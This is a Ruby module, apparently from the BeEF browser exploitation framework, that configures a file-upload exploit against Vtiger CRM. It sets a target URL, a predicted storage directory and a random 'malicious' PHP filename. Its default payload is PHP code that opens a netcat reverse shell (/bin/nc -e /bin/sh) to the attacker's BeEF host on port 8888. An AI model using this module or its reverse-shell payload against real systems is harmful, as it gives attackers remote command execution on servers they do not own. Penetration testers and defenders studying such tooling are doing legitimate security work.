#
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
  class << self
    # Option descriptors the BeEF UI renders for this module.
    #
    # The default 'vtiger_filepath' is derived from the BeEF server's own
    # clock (Time.now): year, full month name, and a "weekN" bucket of the
    # day of month. The default 'vtiger_php' value interpolates the
    # configured beef_host. As a side effect the Configuration singleton is
    # stored in the class-level @configuration.
    #
    # NOTE(review): whether the weekN bucket mirrors the product's real
    # storage layout is not verified anywhere in this file.
    #
    # @return [Array<Hash>] one string-keyed hash per option
    def options
      now = Time.now
      # Day-of-month bucket: 1..7 -> 1, 8..14 -> 2, 15..21 -> 3,
      # 22..28 -> 4, 29..31 -> 5 (same table as a case over ranges).
      week_bucket = ((now.day - 1) / 7) + 1

      @configuration = BeEF::Core::Configuration.instance
      beef_host = @configuration.beef_host

      [
        option('vtiger_url', 'Target Web Server', 'http://vulnerable-vtiger.site', width: '400px'),
        option('vtiger_filepath', 'Target Directory',
               "/storage/#{now.year}/#{now.strftime('%B')}/week#{week_bucket}/", width: '400px'),
        # Random base-32 token so every call yields a fresh filename.
        option('mal_filename', 'Malicious Filename', rand(32**10).to_s(32), width: '400px'),
        option('mal_ext', 'Malicious File Extension', 'PHP', width: '400px'),
        option('vtiger_php', 'Injected PHP (must escape single quotes)',
               "<?php passthru(\"/bin/nc -e /bin/sh #{beef_host} 8888\"); ?>",
               type: 'textarea', width: '400px', height: '100px'),
        option('upload_timeout', 'Upload Timeout', '5000')
      ]
    end

    private

    # One option descriptor: the mandatory name/ui_label/value keys first,
    # then any extra UI keys (type, width, height) as strings, in call order.
    #
    # @param name [String] option name used as the datastore key
    # @param label [String] text shown in the UI
    # @param value [String] default value
    # @param extra [Hash{Symbol => String}] additional UI attributes
    # @return [Hash{String => String}]
    def option(name, label, value, **extra)
      { 'name' => name, 'ui_label' => label, 'value' => value }.merge(extra.transform_keys(&:to_s))
    end
  end

  # Persist the command result once a 'result' entry is present in the
  # datastore; with no result there is nothing to save yet.
  def post_execute
    result = @datastore['result']
    return if result.nil?

    save({ 'result' => result })
  end
end